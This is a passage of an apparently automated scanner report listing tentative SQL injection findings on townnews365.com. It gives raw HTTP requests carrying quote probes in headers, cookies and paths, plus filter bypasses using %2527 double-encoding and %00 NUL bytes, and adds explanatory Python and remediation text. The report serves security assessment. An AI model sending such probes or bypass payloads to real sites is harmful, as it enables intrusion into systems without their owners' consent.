GET /content/tncms/live/global/resources/images/_images/login2.jpg HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://www.townnews365.com/user-generated_solutions/user_account_contributions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751''; __utmb=121545751.3.10.1305412213

Response 2

HTTP/1.1 200 OK
Server: WWW
Cache-Control: public, max-age=600
Content-Type: image/jpeg
Date: Sat, 14 May 2011 22:42:23 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "1931070189"
Last-Modified: Wed, 08 Dec 2010 18:14:04 GMT
Real-Hostname: townnews365.com
Content-Length: 80236
Connection: Keep-Alive
X-Cache-Info: cached

......JFIF.....d.d......Ducky.......Z......Adobe.d...................................................................................................................................................X..
...[SNIP]...

2.28. http://www.townnews365.com/content/tncms/live/global/resources/images/_images/usercontrib1.jpg [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /content/tncms/live/global/resources/images/_images/usercontrib1.jpg

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /content/tncms/live/global/resources/images/_images/usercontrib1.jpg HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q='
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.3.10.1305412213

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /content/tncms/live/global/resources/images/_images/usercontrib1.jpg HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=''
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.3.10.1305412213

Response 2

HTTP/1.1 200 OK
Server: WWW
Cache-Control: public, max-age=600
Content-Type: image/jpeg
Date: Sat, 14 May 2011 22:42:24 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "661283329"
Last-Modified: Wed, 08 Dec 2010 18:14:03 GMT
Real-Hostname: townnews365.com
Content-Length: 127591
Connection: Keep-Alive
X-Cache-Info: cached

......JFIF.....d.d......Ducky.......Z......Adobe.d...................................................................................................................................................X..
...[SNIP]...

2.29. http://www.townnews365.com/content/tncms/live/global/resources/images/_images/usercontrib2.jpg [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /content/tncms/live/global/resources/images/_images/usercontrib2.jpg

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /content/tncms/live/global%2527/resources/images/_images/usercontrib2.jpg HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://www.townnews365.com/user-generated_solutions/user_account_contributions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.3.10.1305412213

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /content/tncms/live/global%2527%2527/resources/images/_images/usercontrib2.jpg HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://www.townnews365.com/user-generated_solutions/user_account_contributions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.3.10.1305412213

Response 2

HTTP/1.1 404 Not Found
Server: WWW
Cache-Control: public, max-age=600
Content-Type: text/html
Date: Sat, 14 May 2011 22:44:40 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "1828397"
Last-Modified: Tue, 14 Oct 2008 18:45:00 GMT
X-Cache-Info: caching
Real-Hostname: townnews365.com
Content-Length: 680

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>    
<title>Element not valid</title>
<style type="text/css">
body { background-color: white;
color: black;

...[SNIP]...

2.30. http://www.townnews365.com/content/tncms/live/global/resources/images/_images/usercontrib2.jpg [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /content/tncms/live/global/resources/images/_images/usercontrib2.jpg

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /content/tncms/live/global/resources/images/_images/usercontrib2.jpg?1'=1 HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://www.townnews365.com/user-generated_solutions/user_account_contributions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.3.10.1305412213

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /content/tncms/live/global/resources/images/_images/usercontrib2.jpg?1''=1 HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://www.townnews365.com/user-generated_solutions/user_account_contributions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.3.10.1305412213

Response 2

HTTP/1.1 417 Cache busting detected
Content-Type: text/html
Date: Sat, 14 May 2011 22:43:44 GMT
Connection: Keep-Alive
Content-Length: 26

417 Cache busting detected

2.31. http://www.townnews365.com/content/tncms/live/global/resources/images/icon-05.gif [__utmz cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /content/tncms/live/global/resources/images/icon-05.gif

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /content/tncms/live/global/resources/images/icon-05.gif HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://townnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)%00'; __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.1.10.1305412213

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /content/tncms/live/global/resources/images/icon-05.gif HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://townnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)%00''; __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.1.10.1305412213

Response 2

HTTP/1.1 200 OK
Server: WWW
Cache-Control: public, max-age=600
Content-Type: image/gif
Date: Sat, 14 May 2011 22:37:35 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "1696493"
Last-Modified: Wed, 08 Dec 2010 18:13:45 GMT
Real-Hostname: townnews365.com
Content-Length: 296
Connection: Keep-Alive
X-Cache-Info: cached

GIF89a
.
.."............................................................................................................................................................................................
...[SNIP]...

2.32. http://www.townnews365.com/content/tncms/live/global/resources/images/icon-05.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /content/tncms/live/global/resources/images/icon-05.gif

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /content/tncms/live/global/resources/images/icon-05.gif?1'=1 HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://townnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.1.10.1305412213

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /content/tncms/live/global/resources/images/icon-05.gif?1''=1 HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://townnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.1.10.1305412213

Response 2

HTTP/1.1 417 Cache busting detected
Content-Type: text/html
Date: Sat, 14 May 2011 22:43:24 GMT
Connection: Keep-Alive
Content-Length: 26

417 Cache busting detected

2.33. http://www.townnews365.com/content/tncms/live/user/user_admin-core-base/resources/images/user_70.png [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /content/tncms/live/user/user_admin-core-base/resources/images/user_70.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /content/tncms/live%2527/user/user_admin-core-base/resources/images/user_70.png HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://www.townnews365.com/users/login/?referer_url=/user-generated_solutions/user_account_contributions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.4.10.1305412213

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /content/tncms/live%2527%2527/user/user_admin-core-base/resources/images/user_70.png HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://www.townnews365.com/users/login/?referer_url=/user-generated_solutions/user_account_contributions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.4.10.1305412213

Response 2

HTTP/1.1 404 Not Found
Server: WWW
Cache-Control: public, max-age=600
Content-Type: text/html
Date: Sat, 14 May 2011 22:44:25 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "1828397"
Last-Modified: Tue, 14 Oct 2008 18:45:00 GMT
X-Cache-Info: caching
Real-Hostname: townnews365.com
Content-Length: 680

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>    
<title>Element not valid</title>
<style type="text/css">
body { background-color: white;
color: black;

...[SNIP]...

2.34. http://www.townnews365.com/content_management_solutions/about_blox/editorial/editorial-core-base/resources/images/user_70.png [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /content_management_solutions/about_blox/editorial/editorial-core-base/resources/images/user_70.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /content_management_solutions/about_blox/editorial'/editorial-core-base/resources/images/user_70.png HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /content_management_solutions/about_blox/editorial''/editorial-core-base/resources/images/user_70.png HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: WWW
Cache-Control: public, max-age=600
Content-Type: text/html
Date: Sat, 14 May 2011 22:40:56 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "1828397"
Connection: close
Last-Modified: Tue, 14 Oct 2008 18:45:00 GMT
X-Cache-Info: caching
Real-Hostname: townnews365.com
Content-Length: 680

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>    
<title>Element not valid</title>
<style type="text/css">
body { background-color: white;
color: black;

...[SNIP]...

2.35. http://www.townnews365.com/content_management_solutions/murlinstats/editorial/editorial-core-base/resources/images/user_70.png [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /content_management_solutions/murlinstats/editorial/editorial-core-base/resources/images/user_70.png

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
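An added example of the mechanism the paragraph above describes (not code from the report or from the target): a filter written in C treats the request as a NUL-terminated string and stops at the decoded %00, while the length-aware application behind it (the responses advertise X-PHP-Engine) receives everything including the quote. The Python below uses ctypes to read a buffer the way strlen() and strstr() would. It assumes the %00 is decoded once by the web server before the filter runs, as for the query-string and path payloads in this section; a %00 placed literally in a header, as in the User-Agent items, only behaves this way if something decodes it first. Function names are hypothetical.

```python
"""Why a %00 before the quote can slip past a native-code filter.

Added example; not from the original report. It models, not reproduces, the
filter in front of the scanned host. Function names are hypothetical.
"""
import ctypes
from urllib.parse import unquote_to_bytes


def native_view(data: bytes) -> bytes:
    """What a C string function sees: the bytes up to the first NUL.

    ctypes.string_at with no size argument reads until NUL, exactly as
    strlen()/strstr() would on the same buffer."""
    buf = ctypes.create_string_buffer(data, len(data) + 1)
    return ctypes.string_at(ctypes.addressof(buf))


def waf_blocks(data: bytes) -> bool:
    """Native-code filter: refuses any request containing a single quote,
    but only inspects the part of the buffer before the first NUL."""
    return b"'" in native_view(data)


def app_sees_quote(data: bytes) -> bool:
    """Length-aware application code (PHP, Python, Java) keeps the whole buffer."""
    return b"'" in data


def fixed_waf_blocks(data: bytes) -> bool:
    """Corrected filter: reject embedded NUL outright, then inspect all bytes
    using the length rather than a terminator."""
    if b"\x00" in data:
        return True
    return b"'" in data


def evaluate(raw_param: str) -> dict:
    """Decode a URL-encoded parameter once (as the web server does) and
    report what each layer sees."""
    data = unquote_to_bytes(raw_param)
    return {
        "native_filter_blocks": waf_blocks(data),
        "app_receives_quote": app_sees_quote(data),
        "fixed_filter_blocks": fixed_waf_blocks(data),
    }


if __name__ == "__main__":
    # "1'" is the plain probe; "1%00'" is the bypass form used in this report.
    for probe in ("1'", "1%00'"):
        print(probe, evaluate(probe))
```

The plain probe is caught by both filters; the %00 form passes the native filter while the application still receives the quote, which is the gap the remediation text tells you to close in the application itself rather than in the filter.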

Request 1

GET /content_management_solutions/murlinstats/editorial/editorial-core-base%00'/resources/images/user_70.png HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /content_management_solutions/murlinstats/editorial/editorial-core-base%00''/resources/images/user_70.png HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: WWW
Cache-Control: public, max-age=600
Content-Type: text/html
Date: Sat, 14 May 2011 22:40:56 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "1828397"
Connection: close
Last-Modified: Tue, 14 Oct 2008 18:45:00 GMT
X-Cache-Info: caching
Real-Hostname: townnews365.com
Content-Length: 680

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>    
<title>Element not valid</title>
<style type="text/css">
body { background-color: white;
color: black;

...[SNIP]...

2.36. http://www.townnews365.com/content_management_solutions/murlinstats/global/resources/styles/print.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /content_management_solutions/murlinstats/global/resources/styles/print.css

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. Note that the target here is a static stylesheet path and the two captured responses are a 503 "Server Too Busy" and a 404 "Element not valid" from the image tier; neither contains database error text.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
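An added example (not from the report) of the ordering problem the remediation paragraph describes: a filter that validates after the web server's single decode lets %2527 through because it is looking at %27, and a later custom decode in the application turns that into a quote. The fixed pipeline canonicalises to a fixed point first and validates afterwards, with no decode following validation. Function names are hypothetical.

```python
"""Validation before a second URL-decode: how %2527 gets through.

Added example; not code from the original report. It models a filter that
inspects the request after the web server's single decode, followed by
application code that decodes again. Function names are hypothetical.
"""
from typing import Tuple
from urllib.parse import unquote

BLOCKED = ("'", '"', ";", "--")


def server_decode(raw: str) -> str:
    """The one decode the web server performs on the request line."""
    return unquote(raw)


def filter_allows(value: str) -> bool:
    """Filter as it runs in front of the application: it looks for literal
    metacharacters in the value it is handed."""
    return not any(b in value for b in BLOCKED)


def app_decode_again(value: str) -> str:
    """Vulnerable pattern: a second, custom decode after validation."""
    return unquote(value)


def canonicalise(value: str, max_rounds: int = 5) -> str:
    """Decode until the value stops changing; only then is it safe to validate.
    A value still changing after max_rounds is treated as hostile."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("input does not reach a fixed point under URL-decoding")


def vulnerable_pipeline(raw: str) -> Tuple[bool, str]:
    """Returns (accepted, value the application finally uses)."""
    once = server_decode(raw)
    if not filter_allows(once):
        return False, once
    return True, app_decode_again(once)


def fixed_pipeline(raw: str) -> Tuple[bool, str]:
    """Canonicalise first, validate second, never decode afterwards."""
    value = canonicalise(server_decode(raw))
    if not filter_allows(value):
        return False, value
    return True, value


if __name__ == "__main__":
    # %27 is the single-encoded quote; %2527 is the double-encoded form from the report.
    for raw in ("print.css%27", "print.css%2527"):
        print(raw, vulnerable_pipeline(raw), fixed_pipeline(raw))
```

With %2527 the vulnerable pipeline accepts the request and hands the application a literal quote; the fixed pipeline rejects it because validation runs on the fully canonicalised value.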

Request 1

GET /content_management_solutions/murlinstats/global/resources/styles/print.css%2527 HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /content_management_solutions/murlinstats/global/resources/styles/print.css%2527%2527 HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: WWW
Cache-Control: public, max-age=600
Content-Type: text/html
Date: Sat, 14 May 2011 22:41:17 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "1828397"
Connection: close
Last-Modified: Tue, 14 Oct 2008 18:45:00 GMT
X-Cache-Info: caching
Real-Hostname: townnews365.com
Content-Length: 680

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>    
<title>Element not valid</title>
<style type="text/css">
body { background-color: white;
color: black;

...[SNIP]...

2.37. http://www.townnews365.com/content_management_solutions/news/ [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /content_management_solutions/news/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /content_management_solutions/news/ HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /content_management_solutions/news/ HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527%2527

Response 2

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 4726236
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Sat, 14 May 2011 22:40:40 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 2.1792
Accept-Ranges: bytes
X-PHP-Engine: enabled
Real-Hostname: townnews365.com
X-TNCMS-Served-By: cmsapp15
Content-Length: 71193
Connection: close
X-Cache-Info: cached


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<base href=
...[SNIP]...

2.38. http://www.townnews365.com/content_management_solutions/news/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /content_management_solutions/news/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

